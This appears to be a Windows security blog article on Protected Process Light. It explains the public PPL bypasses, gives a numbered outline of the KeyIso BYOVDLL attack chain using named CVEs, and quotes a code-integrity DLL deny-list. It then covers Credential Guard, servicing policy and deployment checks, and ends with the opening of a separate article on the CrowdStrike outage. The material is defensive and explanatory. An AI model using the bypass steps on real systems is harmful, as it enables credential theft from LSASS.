The Audit bit revisits the table from a different angle. The bit is annotated Reserved in itm4n's public structure definition and named without semantic gloss in Ionescu Part 1; the precise runtime emission shape on an OpenProcess denial is not enumerated in any of Ionescu Part 1, Forshaw 2018, itm4n's RunAsPPL writeup, or Microsoft Learn's RunAsPPL page (whose CodeIntegrity events 3033/3063/3065/3066 are scoped to AuditLevel under IFEO\LSASS.exe and to DLL-load failures, not per-process Audit-bit denials) [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field name and bit position imply a forensic side-channel; the exact event shape is not in the public record.Two adjacent kernel mechanisms exist in the same neighbourhood but mediate different threat models. PROCESS_TRUST_LABEL_ACE (a Trust SID ACL entry, introduced in Windows 8.1 alongside PPL) is an ACL-side companion that runs inside SeAccessCheck -- it adds a token-style trust label that interacts with the security descriptor in the standard way. Code Integrity Guard (ProcessSignaturePolicy) is a per-process signed-image enforcer settable at CreateProcess time via the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY attribute. Neither is part of PPL; both interact with the same problem space.

The kernel verifies who is asking, what they are asking for, and at what rung the target sits. What the kernel cannot verify is the behaviour of code that arrives through a signed channel and then executes against attacker-controlled data. That structural seam is the entire premise of the bypass arms race, and it is the next section.

8. The Bypass Arms Race -- Forshaw, itm4n, Landau

If the kernel only verifies the channel by which code enters a PPL, every bypass should attack the seam between channel and behaviour. Test that prediction against the public record. Since 2018, four named bypass acts have hit major Microsoft research blogs. All four sit in the same structural class.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every public PPL bypass since 2018 attacks the seam between what the channel proves (a signature, an EKU, a section identity) and what the code does once mapped.

Act I (2018) -- Forshaw and JScript-into-PPL

James Forshaw, then at Google Project Zero, published "Injecting Code into Windows Protected Processes Using COM" in October 2018 [@forshaw-2018-10]. The mechanism: a PPL can be made to instantiate a COM object whose CLSID resolves to scrobj.dll, the Microsoft-signed Windows Script Component scripting host. Once loaded into the PPL, the script object accepts attacker-supplied source code and executes it inside the protected process. The DLL is signed. The kernel admits it. The kernel cannot reason about the JScript source it then runs.

Microsoft's fix in Windows 10 1803 (April 2018, deployed broadly through that year) was a hardcoded deny-list in CI.DLL. Forshaw's own writeup gives the source verbatim [@forshaw-2018-10]:

UNICODE_STRING g_BlockedDllsForPPL[] = {
    DECLARE_USTR("scrobj.dll"),
    DECLARE_USTR("scrrun.dll"),
    DECLARE_USTR("jscript.dll"),
    DECLARE_USTR("jscript9.dll"),
    DECLARE_USTR("vbscript.dll")
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(
    PEPROCESS Process, LPBYTE Image, SIZE_T ImageSize)
{
    if (!PsIsProtectedProcess(Process)) return STATUS_SUCCESS;
    // walk g_BlockedDllsForPPL; if any match, return STATUS_DYNAMIC_CODE_BLOCKED
    ...
}

Five DLLs, hardcoded. Microsoft Learn corroborates the policy on the user-facing side [@learn-am-services]:

The following scripting DLLs are forbidden by CodeIntegrity inside a protected process: scrobj.dll, scrrun.dll, jscript.dll, jscript9.dll, and vbscript.dll.

Channel: a Microsoft-signed DLL. Behaviour: arbitrary attacker script. The fix narrows the channel by name-listing the five DLLs known to admit attacker behaviour. The class survives.The mechanism was previewed at Recon Montreal 2018 in the joint Forshaw-Ionescu talk "Unknown Known DLLs and other Code Integrity Trust Violations" (June 15-17, 2018) [@recon-mtl-2018]. Forshaw's August 2017 "Bypassing VirtualBox Process Hardening" essay [@forshaw-2017-vbox] is the structural precursor -- it makes the same channel-vs-behaviour argument against a different kernel-supported process-hardening regime.

Act II (2018-2021) -- DefineDosDevice and PPLdump

In his August 2018 post on object-directory exploits [@forshaw-2018-08], Forshaw added a single throwaway sentence that the security community would spend three years productising. itm4n quotes it verbatim in his 2021 SCRT walkthrough [@itm4n-scrt]:

Abusing the DefineDosDevice API actually has a second use, it's an Administrator to Protected Process Light (PPL) bypass.

The mechanism, fully worked out by itm4n in April 2021, is structural and uses that same primitive. As an administrator, call DefineDosDevice to create a symbolic link in \KnownDlls\ (the object-directory subkey that the loader uses for fast known-DLL lookups). The call is dispatched via RPC to csrss.exe, which runs at PPL/WinTcb (rung 6) and so has the lattice authority to write into protected directories. The administrator gets a \KnownDlls\ entry pointing at an attacker-controlled section. Now start a PPL. The PPL's loader resolves DLL names through \KnownDlls\ and finds the administrator's entry. The PPL maps the attacker's section without re-validating its on-disk signature, because \KnownDlls\ is the kernel's vouched-for fast path.

itm4n's PPLdump tool, published April 2021, automated the attack. The README test matrix lists every Windows version it ran against [@ppldump-repo]. For fifteen months, an administrator could dump any PPL's memory, including lsass.exe, despite RunAsPPL.

Microsoft's fix arrived in build 19044.1826 (the July 2022 update to Windows 10 21H2). itm4n's "End of PPLdump" writeup describes the patch and the BinDiff diff verbatim [@itm4n-end-of-ppldump]:

The conclusion is that PPLs now appear to be behaving just like PPs and therefore no longer rely on Known DLLs.

The fix patched LdrpInitializeProcess in NTDLL to skip \KnownDlls\ for PPL processes, behind a Velocity feature flag (Feature_Servicing_2206c_38427506__private_IsEnabled). PPLdump's repository README now opens with [@ppldump-repo]:

2022-07-24 - As of Windows 10 21H2 10.0.19044.1826 (July 2022 update), the exploit implemented in PPLdump no longer works. A patch in NTDLL now prevents PPLs from loading Known DLLs.

itm4n's structural finding -- that *PPLs honoured \KnownDlls\ while PPs did not* -- is the most interesting failure in the eight-year run, because the asymmetry sat in plain sight from 2013 to 2022 and nobody had asked "why are PPs and PPLs loading sections differently?" The fix closes one asymmetry. The structural class survives.PPLdump's substitution chain uses NTFS transactions and Forrest Orr's "phantom DLL hollowing" technique to materialise the attacker-controlled section on disk in a way the kernel section creator will accept [@forrest-orr-hollow]. Orr's writeup is the original publication of the hollowing primitive; PPLdump composes it with the \KnownDlls\ redirection trick.

Act III (2022-2024) -- Landau's PPLFault CI TOCTOU

Gabriel Landau, then at Elastic, presented "PPLdump Is Dead. Long Live PPLdump!" at Black Hat Asia 2023 [@bh-asia-2023-pdf]. The mechanism is a Time-Of-Check / Time-Of-Use bug at the section-creation layer.

A class of bug in which a security property is verified at one point in time but the underlying object is mutable between the check and the use. The protected resource passes its check, then changes between check and access, and the operation proceeds against the changed state without re-verification.

The TOCTOU here is subtle. When a PPL calls NtCreateSection on a Microsoft-signed DLL, the kernel's memory manager calls MiValidateSectionCreate, which calls into ci.dll to verify the file's Authenticode signature. The check succeeds. The section is created. But the memory manager does not page in the file contents at section-create time; it pages them in lazily, on demand, when threads first touch the mapped pages. If an attacker can keep the section's backing file unsubstituted during the signature check and substituted during the lazy page-in, the kernel will execute attacker bytes through a section whose signature it already verified.

Landau's exploit uses Windows' CloudFilter API. An attacker holds an exclusive oplock on a Microsoft-signed DLL during the section-create signature check. After the check passes, the attacker's CloudFilter FetchDataCallback provides different bytes (the payload) when the kernel pages in the section. The PPL maps and executes the payload. Landau's Elastic post documents the chain verbatim [@elastic-pplfault]:

The internal memory manager function MiValidateSectionCreate relies on the Code Integrity module ci.dll to handle the requisite cryptography and PKI policy.

Microsoft's fix shipped in Windows Insider Canary build 25941 on September 1, 2023 [@elastic-pplfault]:

On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941 ... Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.

The fix narrows the immediate channel by extending page-hash validation to PPL-loaded images that reside on remote (SMB redirector) paths -- the precise surface that PPLFault required to drive its CloudFilter FetchDataCallback substitution [@elastic-pplfault]. Locally-cached PPL DLL loads continue to rely on the section-create signature check, so the structural seam survives. The GA patch shipped on February 13, 2024 [@pplfault-repo]:

2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13.

Channel: a signed Microsoft DLL whose hash matched at section create. Behaviour: attacker payload mapped via the lazy page-in. The fix narrows the channel by widening the verification surface from "the file at section-create time" to "every page at fault time." The class survives.

Act IV (2022-2024) -- BYOVDLL and itm4n's KeyIso chain

Bring Your Own Vulnerable DLL. Coined by Gabriel Landau on Twitter in October 2022 (itm4n screenshots the original tweet [@itm4n-ghost-part1]; tweet status 1580067594568364032). Productised by itm4n in August 2024 in "Ghost in the PPL Part 1."

A bypass class against any signature-gated security mechanism in which the attacker loads a *legitimately signed but historically vulnerable* binary and exploits the known vulnerability inside it. The signature check passes; the vulnerability does the work. The structural property that makes the class hard to fix is that the kernel cannot deny-list legitimately signed older Microsoft DLLs without breaking the deployments that still depend on them.

itm4n's specific chain targets the CNG Key Isolation service ("KeyIso"), which runs in lsass.exe and so inherits its PPL/Lsa protection. The chain is precise [@itm4n-ghost-part1]:

As administrator, stop the KeyIso service.
Set HKLM\SYSTEM\CurrentControlSet\Services\KeyIso\Parameters\ServiceDll to point at an older keyiso.dll extracted from Microsoft update KB5023778. This DLL is Microsoft-signed; the kernel admits it.
Restart the KeyIso service. The older keyiso.dll loads into LSASS at PPL/Lsa.
Trigger CVE-2023-36906, an out-of-bounds read information disclosure in the older keyiso.dll, to leak an address.
Trigger CVE-2023-28229, one of six use-after-frees in the same DLL, to obtain control of a CALL target via the RAX register.
Execute attacker code at PPL/Lsa.

The CVEs are real and tracked. k0shl's writeup is the primary root-cause analysis [@k0shl-keyiso]:

Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure.

NVD records both [@nvd-2023-28229] [@nvd-2023-36906]. Y3A's GitHub repository [@y3a-cve-poc] provides a public PoC for CVE-2023-28229 that itm4n's chain composes.

Channel: an actually-Microsoft-signed DLL. Behaviour: the memory-safety vulnerability inside it. There is no general fix announced. Microsoft fixed the specific CVEs by shipping a newer keyiso.dll, but the older DLL remains in circulation (it ships inside every patched cumulative update bundle), and a kernel that has to admit every legitimately signed older Microsoft DLL has no general defense against the next CVE-of-the-month.

Note: BYOVDLL has no general patch. Microsoft fixes each underlying CVE on the standard cumulative-update cadence. The class persists for as long as the kernel admits older signed Microsoft DLLs into PPLs, which is for as long as legitimately deployed software depends on the older DLLs.

timeline title PPL Bypass Arms Race (2018-2024) 2018-10 : Forshaw JScript-into-PPL : Fix 1803 Apr 2018 : g_BlockedDllsForPPL deny-list 2021-04 : itm4n PPLdump (KnownDlls) : Fix Jul 2022 build 19044.1826 : LdrpInitializeProcess patch 2022-09 : Landau PPLFault (TOCTOU) : Fix Feb 2024 13 GA : CI page-hash for PPLs 2024-08 : itm4n BYOVDLL KeyIso chain : No general fix : CVEs patched piecewise

Act	Year	Channel verified	Behaviour exploited	Microsoft fix	Fix date
I	2018	Microsoft-signed `scrobj.dll`	JScript source executed by COM object	`g_BlockedDllsForPPL` deny-list of 5 DLLs	Apr 2018 (1803)
II	2021	`\KnownDlls\` symlink (CSRSS-blessed)	Attacker section mapped without re-validation	NTDLL `LdrpInitializeProcess` patch	Jul 2022 (19044.1826)
III	2023	Signed DLL passed `MiValidateSectionCreate`	CloudFilter substitutes bytes on lazy page-in	`/INTEGRITYCHECK` page hashes for PPLs	Feb 2024 (GA)
IV	2024	Legitimately-signed older `keyiso.dll`	Use-after-free + OOB read (CVE-2023-28229, CVE-2023-36906)	None (CVE-by-CVE)	open

flowchart TD A[Admin stops KeyIso service] B[Repoint ServiceDll to older keyiso.dll
from KB5023778] C[Restart KeyIso service] D[Older keyiso.dll loads
into lsass.exe PPL/Lsa] E[Trigger CVE-2023-36906
OOB read for info leak] F[Trigger CVE-2023-28229
UAF for RAX control] G[Code execution at PPL/Lsa] A --> B --> C --> D --> E --> F --> G itm4n explicitly attributes the BYOVDLL framing to Landau's October 2022 tweet, even though itm4n's KeyIso chain is the first public productisation. The attribution chain matters because it documents how a one-line research observation (Twitter status 1580067594568364032, screenshot preserved in [@itm4n-ghost-part1]) became a working exploit two years later. The pattern repeats in this domain: Forshaw's one-sentence DefineDosDevice comment to PPLdump (3 years); Landau's BYOVDLL tweet to itm4n's KeyIso chain (2 years). The structural class outlives its discoverer.

Four acts, one class. Every public bypass since 2018 has lived in the same narrow shape: code that becomes part of a PPL through a signed channel and executes attacker-influenced data once mapped. Each generation of fix narrows what the channel admits -- name-list five DLLs; ignore \KnownDlls\; page-hash every section; CVE-patch every vulnerable older DLL. The class survives because the kernel cannot reason about behaviour. By Rice's theorem it cannot reason about behaviour in general; in practice, it has nowhere even to start.

If lsass.exe code execution is reachable through BYOVDLL, where are the actual secrets? Not in lsass.exe. Not anywhere the kernel can read at all. The next section is the companion boundary.

9. The Companion Boundary -- Credential Guard, VBS, and `LsaIso.exe`

itm4n opens his RunAsPPL walkthrough with a warning [@itm4n-runasppl]:

I noticed that this protection tends to be confused with Credential Guard, which is completely different.

The confusion is understandable. Both run on Windows. Both protect LSASS. Both are configured by domain administrators. Both yield "ACCESS_DENIED" to Mimikatz when working correctly. They are nonetheless answering different questions, and they stack rather than replace each other.

PPL stops an administrator from reading kernel-trusted user-mode memory. It does nothing against a kernel-mode attacker who can simply zero the Protection byte in the target EPROCESS. The kernel-mode attacker is the next threat-model rung up, and the kernel-mode attacker is the threat that Credential Guard answers, by moving the credentials themselves out of lsass.exe entirely.

A Hyper-V-based isolation regime in which the Windows hypervisor partitions the system into Virtual Trust Levels (VTLs). VTL0 contains the normal Windows kernel and user-mode processes. VTL1 contains the Secure Kernel and a small set of user-mode trustlets. Memory in VTL1 is inaccessible to VTL0, even from VTL0 kernel-mode code. A user-mode process running inside VTL1. Trustlets are Microsoft-signed at a specific protected-process equivalent rung within VTL1 and serve as the user-mode hosts for VBS-isolated functionality. `LsaIso.exe` is the trustlet that holds the actual credential material on Credential Guard-enabled hosts.

The architecture is, at the highest level, three layers: VTL0 user-mode, VTL0 kernel, and VTL1 (Secure Kernel plus trustlets). On a Credential Guard-enabled host, lsass.exe still exists in VTL0 user-mode, still protects itself with PPL/Lsa, and still answers authentication requests. But it no longer holds the NTLM hashes, Kerberos TGT keys, or Cred Manager domain credentials. Those secrets live in LsaIso.exe, a trustlet in VTL1. When LSASS needs to authenticate a credential, it makes a hypercall into VTL1, and LsaIso.exe performs the cryptographic operation entirely within VTL1 memory, returning only the result. The keys never leave VTL1.

Microsoft's documentation states the threat model directly [@learn-cg]:

Credential Guard prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials.

Credential Guard uses Virtualization-based security (VBS) to isolate secrets so that only privileged system software can access them.

Malware running in the operating system with administrative privileges can't extract secrets that are protected by VBS.

The third sentence is the load-bearing one. Malware running with administrative privileges maps cleanly to a PPL bypass that achieves code execution at PPL/Lsa. Even from inside lsass.exe, the secrets are not there.

flowchart TD subgraph VTL0[VTL0 normal world] Admin[Admin / SYSTEM token] Lsass[lsass.exe at PPL/Lsa] Kern0[VTL0 kernel] end subgraph VTL1[VTL1 secure world] SK[Secure Kernel] Iso[LsaIso.exe trustlet] Secrets[NTLM hashes, Kerberos TGT keys] end Admin -- "PPL barrier (lattice)" --x Lsass Lsass -- hypercall --> Iso Kern0 -- "VBS barrier (VTL boundary)" --x Iso Iso --> Secrets

The two mechanisms stack rather than overlap. PPL prevents an admin from OpenProcess(PROCESS_VM_READ, lsass) at the user-mode lattice level. Credential Guard prevents a kernel-mode attacker who succeeds against PPL from finding the keys, because the keys are in VTL1 memory that the VTL0 kernel cannot read at all. itm4n's "complementary" framing in the RunAsPPL writeup is the right operational summary [@itm4n-runasppl]: deploy both, always both.

Note: PPL gates user-mode admins out of LSASS code memory. Credential Guard gates everything else (kernel-mode attackers, BYOVDLL execution-at-PPL/Lsa) out of the secrets themselves by moving the secrets to VTL1. Each mechanism answers a layer of the threat model the other does not.

Dimension	PPL (LSA protection)	Credential Guard
Threat model	Administrator -> user-mode LSASS	VTL0 kernel + admin -> credential material
Layer	VTL0 user-mode lattice	VTL0 / VTL1 VBS boundary
Kernel-mode attacker	Cannot stop them	Stops them (VBS-isolated memory)
MSRC classification	Defense in depth	Security boundary
Default-on (consumer)	Audit mode, Win11 22H2	n/a (enterprise)
Default-on (enterprise)	Audit mode, Win11 22H2	Enabled, Win11 22H2 / Win Server 2025 (domain-joined non-DC)

The architecture of `LsaIso.exe`, its trustlet ID, its IUM EKU, and the hypercall plumbing between LSASS and the trustlet are the subject of a separate article in this series ("VBS Trustlets: What Actually Runs in the Secure Kernel"). The cross-link is deliberate: PPL and Credential Guard are paired in practice, but the architectural depth of VTL1 is its own subject.

Credential Guard's default-on rollout, recorded in Microsoft Learn [@learn-cg]:

Starting in Windows 11, 22H2 and Windows Server 2025, Credential Guard is enabled by default on domain-joined, non-DC systems that meet hardware requirements.

Two stacked mechanisms; one classified as a security boundary, one not. The next section asks what the classification means.

10. Where PPL Isn't a Security Boundary -- Microsoft's Servicing Criteria

Gabriel Landau's "Inside Microsoft's Plan to Kill PPLFault" essay states the classification in one sentence [@elastic-pplfault]:

Microsoft does not consider PPL to be a security boundary, meaning they won't prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically addressed some such vulnerabilities on a less-urgent basis.

Microsoft's "Windows Security Servicing Criteria" defines the term security boundary directly [@msrc-servicing]:

A security boundary provides a logical separation between the code and data of security domains with different levels of trust. For example, the separation between kernel mode and user mode is a classic [...] security boundary.

A logical separation between code and data of security domains with different levels of trust. Microsoft commits to servicing security boundary violations with out-of-band patches when the severity bar is met. The kernel-mode / user-mode separation is the canonical example. Per Microsoft's published servicing criteria, PPL is *not* on the security-boundary list. A security feature that raises the cost of an attack without guaranteeing prevention. Microsoft treats defense-in-depth features as servicing targets on the standard cumulative-update cadence, not as out-of-band patch priorities. PPL falls into this category per Microsoft's published classification.

The relevant excerpts of the criteria page enumerate which surfaces are and are not boundaries. The live MSRC page renders that enumeration table client-side via JavaScript; the raw HTML returned by automated fetchers contains only the React shell. The text of the enumeration is preserved in the Wayback Machine capture at archive date 2023-05-06 [@msrc-criteria-archive], and Landau's follow-on Elastic post quotes the relevant administrative-process row verbatim [@elastic-byovd-admin]:

Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strong[ly] isolated from the kernel boundary.

The corresponding row for PPL is the same shape: administrative-process-to-PPL is not isolated as a security boundary. Landau filed VULN-074311 with MSRC in September 2022 disclosing both an admin-to-PPL and a PPL-to-kernel zero-day. The Elastic post records MSRC's classification of the disclosure verbatim [@elastic-byovd-admin]:

MSRC similarly does not consider admin-to-PPL a security boundary, instead classifying it as a defense-in-depth security feature.

The MSRC servicing-criteria page's *definition* of "security boundary" is retrievable from raw HTML and verified against the live page. The *enumeration* of which Windows surfaces are or are not boundaries lives in a client-side rendered table and is not present in the raw HTML payload. The verifiable trail for "PPL is excluded from the boundary list" is the Wayback Machine capture combined with Elastic's verbatim quotation of MSRC's classification.

The operational consequence is direct. A published PPL bypass does not trigger an out-of-band patch. It is fixed on the next major-release cadence, sometimes faster if Microsoft has internal motivation. The disclosure-to-fix half-lives are public record:

Bypass	Disclosed	Microsoft fix	Disclosure-to-fix
Forshaw 2018 JScript-into-PPL	Oct 2018	Apr 2018 (1803, pre-disclosure)	~0 months (Microsoft fixed first)
itm4n 2021 PPLdump (KnownDlls)	Apr 2021	Jul 2022 (build 19044.1826)	~15 months
Landau 2023 PPLFault (CI TOCTOU)	Apr-Sep 2023	Feb 2024 (GA)	~5-11 months
itm4n 2024 BYOVDLL (KeyIso chain)	Aug 2024	none (open, CVE-by-CVE)	open

Note: A correctly classified PPL bypass is fixed on the standard cumulative-update cadence, not out-of-band. The implication for defenders is operational: PPL is exactly as strong as the engineering velocity Microsoft chooses to invest in it. Treat detection (Section 11) and the Credential Guard companion (Section 9) as load-bearing.

The reader takeaway is the third Aha moment of the article. PPL is real, kernel-enforced, structurally elegant, and demonstrably effective against the threat it was designed for (administrator-from-user-mode reads of LSASS). It is also explicitly not a security boundary per Microsoft's own published servicing policy, and that classification is the most important fact about it. Plan for bypasses. Stack with Credential Guard. Treat detection as primary, not secondary.

11. Practical Guide -- Configuring, Verifying, and Monitoring PPL

If you are deploying PPL on a corporate fleet, run this checklist. The order is deliberate: audit before enforce, verify before trust the verifier, and detect because no static control survives unmotivated.

Deploy

Note: Enable AuditLevel = 8 under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe for two months [@learn-runasppl]. This is a different registry hive from RunAsPPL (which lives under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); mixing the two values up is the most common Stage 0 deployment error (see §6). Collect CodeIntegrity events 3065 and 3066 to enumerate every LSASS plug-in that would fail enforcement (smart-card middleware, third-party CSPs, password-filter DLLs). Re-sign or replace the failing modules. Set RunAsPPL = 1 on Secure Boot-capable machines; the kernel automatically stores the policy in a UEFI variable. RunAsPPL = 2 (Win11 22H2+) is the softer option that omits the UEFI variable for environments requiring admin-removable protection.

Note: For third-party EDR, confirm the agent daemon runs at PPL/Antimalware (signer rung 3, byte 0x31). Process Explorer exposes this via View -> Select Columns -> Protection. System Informer (the modern Process Hacker fork that itm4n recommends in his BYOVDLL writeup [@itm4n-ghost-part1]) shows the same field in its process list. If your EDR is not running at PPL/Antimalware, it does not have the kernel's protection against admin tampering even when its vendor claims "protected" in marketing material. Process Explorer's "Protection" column ships in the canonical Sysinternals distribution [@sysinternals-procexp]; it reads EPROCESS.Protection via the NtQueryInformationProcess entry point [@learn-ntqueryinfoproc], although the specific ProcessProtectionInformation information-class value is not enumerated in the public Learn PROCESSINFOCLASS table -- the value is community-documented from Windows headers and reverse engineering rather than from a Microsoft Learn API reference.

Verify

Note: On a host you suspect of misconfiguration, attach WinDbg to the kernel and run !process 0 7 lsass.exe. The output includes the _PS_PROTECTION byte. Decode it with the formula from §3 above: ((value & 0xF0) >> 4) is the signer rung; value & 0x07 is the type; (value >> 3) & 1 is the audit bit. A RunAsPPL = 1 host yields 0x41 (PPL + Lsa). The Defender service yields 0x31 (PPL + Antimalware). csrss.exe yields 0x61 (PPL + WinTcb). If lsass.exe shows 0x00, the registry policy did not take effect on this boot.

{function decode(b) { const t = b & 0x07, a = (b >> 3) & 0x01, s = (b >> 4) & 0x0F; const tn = ['None', 'ProtectedLight', 'Protected']; const sn = ['None','Authenticode','CodeGen','Antimalware', 'Lsa','Windows','WinTcb','Max']; return '0x' + b.toString(16).padStart(2,'0') + ' = ' + (sn[s] || s) + '-' + (tn[t] || t) + (a ? ' (Audit on)' : ''); } // Three benchmark values you should be able to recognise by sight console.log(decode(0x31)); // MsMpEng.exe (Defender at PPL/Antimalware) console.log(decode(0x41)); // lsass.exe under RunAsPPL=1 console.log(decode(0x61)); // csrss.exe (PPL/WinTcb)}

Monitor

Note: The CodeIntegrity provider emits three event IDs that matter for PPL monitoring [@learn-runasppl]: | Event ID | Provider | What it tells you | |---|---|---| | 3033 | Microsoft-Windows-CodeIntegrity | A DLL load was blocked by CI (PPL or otherwise) | | 3063 | Microsoft-Windows-CodeIntegrity | Enforcement-mode: LSASS plug-in failed the shared-section security requirement (complement of audit-mode event 3065) | | 3065 | Microsoft-Windows-CodeIntegrity | LSASS plug-in failed the shared-section requirement | | 3066 | Microsoft-Windows-CodeIntegrity | LSASS plug-in failed the Microsoft signing level requirement | Sysmon Event 10 (ProcessAccess) captures OpenProcess denials with the requested access mask and is the cheapest detection for a Mimikatz-shaped attempt against an RunAsPPL-protected lsass.exe. A burst of 3033 events from a non-Microsoft process targeting lsass.exe is the canonical signal that a PPL bypass attempt is under way.

Note: PPL prevents admin-from-user-mode reads of LSASS. Credential Guard prevents kernel-mode reads of the credentials themselves (and BYOVDLL-style execution at PPL/Lsa). Deploy both. itm4n's "complementary" framing in his RunAsPPL writeup [@itm4n-runasppl] is the right operational model. On Win11 22H2 and Windows Server 2025, Credential Guard is default-on for domain-joined non-DC systems with VBS-capable hardware [@learn-cg]; on older fleets, enable it explicitly via Group Policy or the Device Guard / Credential Guard configuration script. Always both -- either alone leaves a layer of the threat model uncovered.

Note: If you are an EDR vendor wanting your daemon to run at PPL/Antimalware, the path is fixed [@learn-mvi] [@learn-am-services]: 1. Hold Microsoft Virus Initiative membership; maintain independent-lab certification (AV-Comparatives, AV-Test, SE Labs, MRG Effitas, SKD Labs, VB 100, West Coast Labs, AVLab Cybersecurity Foundation). 2. Author an ELAM driver with an embedded <ELAM> resource section enumerating your user-mode binary signing-certificate hashes. 3. Submit the driver through WHQL for Microsoft co-signing. 4. Use Trusted Signing for your user-mode binaries. 5. Verify with Process Explorer that the service launches at PPL/Antimalware after install.

Practitioners who follow the checklist still need to know the common misconceptions. The next section catalogues them.

12. FAQ -- Common Misconceptions

Seven questions practitioners ask after their first PPL deployment.

Yes for full-access termination via `OpenProcess(PROCESS_TERMINATE, ...)`; an admin without a higher signer rung cannot terminate a `PPL/Antimalware` daemon by a direct kill. No for legitimate uninstall: the vendor's MSI installer (or equivalent) typically signals the daemon to shut itself down through its own service-control path, which is gated by ACL and not by the PPL lattice. Operationally, expect administrators to be able to uninstall your EDR but not to terminate its main process from outside the vendor toolchain. No. itm4n's verbatim warning is worth repeating [@itm4n-runasppl]: "I noticed that this protection tends to be confused with Credential Guard, which is completely different." PPL protects `lsass.exe` *as a process* from admin-from-user-mode reads. Credential Guard moves the *credentials themselves* into VTL1 memory via VBS. PPL is a VTL0 user-mode lattice control. Credential Guard is a VTL0 / VTL1 hypervisor boundary. They stack; see Section 9 for the layering and Section 11 Item 5 for the deployment recommendation. Because Microsoft has not classified PPL as a security boundary. The Windows Security Servicing Criteria define a security boundary as a logical separation between security domains at different levels of trust, and Microsoft's published enumeration excludes administrative-process-to-PPL from that list [@msrc-servicing] [@elastic-byovd-admin]. PPL is treated as a defense-in-depth feature. The operational implication is that PPL bypasses are fixed on the next major release cadence rather than out-of-band, with disclosure-to-fix half-lives ranging from approximately five to fifteen months historically (see Section 10 for the data). Practically no for non-AV applications. The protected-process EKU OIDs are gated by Microsoft's certificate authorities; only the Antimalware rung admits third-party certificates, and admission is mediated by ELAM driver + Microsoft Virus Initiative membership [@learn-mvi]. Hobbyist tooling cannot opt in. There is no public path for a non-AV third-party application to claim a PPL rung. If your application requires PPL-style anti-tampering, the realistic options are (a) become an MVI member if your application is an AV/EDR, (b) use Process Mitigation Policies such as Code Integrity Guard for code-injection resistance, or (c) deploy your sensitive operations inside a separate Microsoft-signed service. "Protected service" is informal terminology for a Windows service whose host process runs as a PPL, with the Service Control Manager configured to launch it at a specific signer rung. The deployment plumbing (SCM service configuration, service-DLL packaging, the signing of the host binary) is what makes a service "protected." The PPL machinery is what makes the host process actually resistant to tampering. The two terms describe the same thing from different angles -- one from the SCM-management view, one from the kernel-access-check view. Only if the smart-card middleware DLL is not signed at the LSA level (signer rung 4). Most major smart-card vendors have updated their middleware to be Microsoft-signed at the required level, but legacy or in-house middleware frequently fails enforcement. The recommended workflow is to run `AuditLevel = 8` for two months [@learn-runasppl], collect CodeIntegrity 3065 / 3066 events, enumerate the failing modules, re-sign or replace them, and only then switch to `RunAsPPL = 1`. Skipping the audit period is the single most common cause of authentication outages during LSA protection rollouts. Because the threat model PPL answers is *administrator-from-user-mode*, not *administrator-from-kernel-mode*. PPL is a kernel-enforced gate in the access-check pipeline, but a kernel-mode driver that can write to `EPROCESS.Protection` can zero the byte and disable the gate for any process. The defense against the kernel-mode attacker is a different mechanism: VBS-isolated credentials in VTL1 (Credential Guard), with HVCI / kernel-mode integrity controls preventing arbitrary kernel-mode code from running in the first place. PPL stops one threat; Credential Guard stops the threat one rung up; and the two are intended to be deployed together (Section 9, Section 11 Item 5).

The arc has run from a single Mimikatz error code to a kernel-enforced lattice, a third-party admission path mediated by ELAM and MVI, an arms race shaped by a single structural insight that the kernel verifies the channel and not the behaviour, and a stacked companion boundary that lives in VTL1 because VTL0 has run out of places to hide a key. PPL is not a security boundary. That classification is not a footnote; it is the most important fact about it, because it tells defenders that the mechanism is exactly as strong as the engineering velocity Microsoft chooses to invest. Deploy it. Stack it with Credential Guard. Monitor for the next bypass.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every PPL bypass since 2018 has lived in that seam, every fix has narrowed the channel, and the seam survives because behaviour is, by Rice's theorem, structurally outside what static signature verification can reason about.

The Day 8.5 Million Devices Couldn't Boot -- and How Microsoft Rebuilt Recovery as a Security Surface

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

**On July 19, 2024, the Windows Recovery Environment worked exactly as designed -- and that was the problem.** WinRE assumed a human operator per machine, and CrowdStrike's Channel File 291 priced that assumption at 8.5 million endpoints. The Windows Resiliency Initiative -- Quick Machine Recovery, MVI 3.0, the user-mode endpoint security platform, Intune-surfaced WinRE state, Point-in-Time Restore, and Cloud Rebuild -- is Microsoft's first systemic admission that the recovery path is part of the security architecture. This article maps the architecture, the program, and the trade-off it cannot remove.

1. A Fleet That Cannot Boot Itself

At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 to its Falcon sensor on Windows. Forty-eight minutes later -- 04:57 UTC, give or take an hour depending on which time zone the failing devices happened to wake into -- the calls began. By the time CrowdStrike reverted the file at 05:27 UTC, roughly 8.5 million Windows endpoints were stuck in a bug-check loop on csagent+0xe14ed: a read-out-of-bounds page fault inside a kernel-mode driver registered as SERVICE_SYSTEM_START (Start=1), so it reloaded on every reboot [@crowdstrike-tech-details, @ms-security-jul27, @ms-crowdstrike-jul20].

The fix was published almost immediately. "Boot to Safe Mode," it said. "Delete C-00000291*.sys. Reboot." If the volume was BitLocker-encrypted, find the recovery key first [@ms-kb5042421]. The instruction was technically correct. It was also a procedure for one machine. The Windows Recovery Environment that the procedure depended on -- WinRE -- worked exactly as it was designed to work, on every one of those 8.5 million devices [@ms-crowdstrike-jul20]. That was the problem.

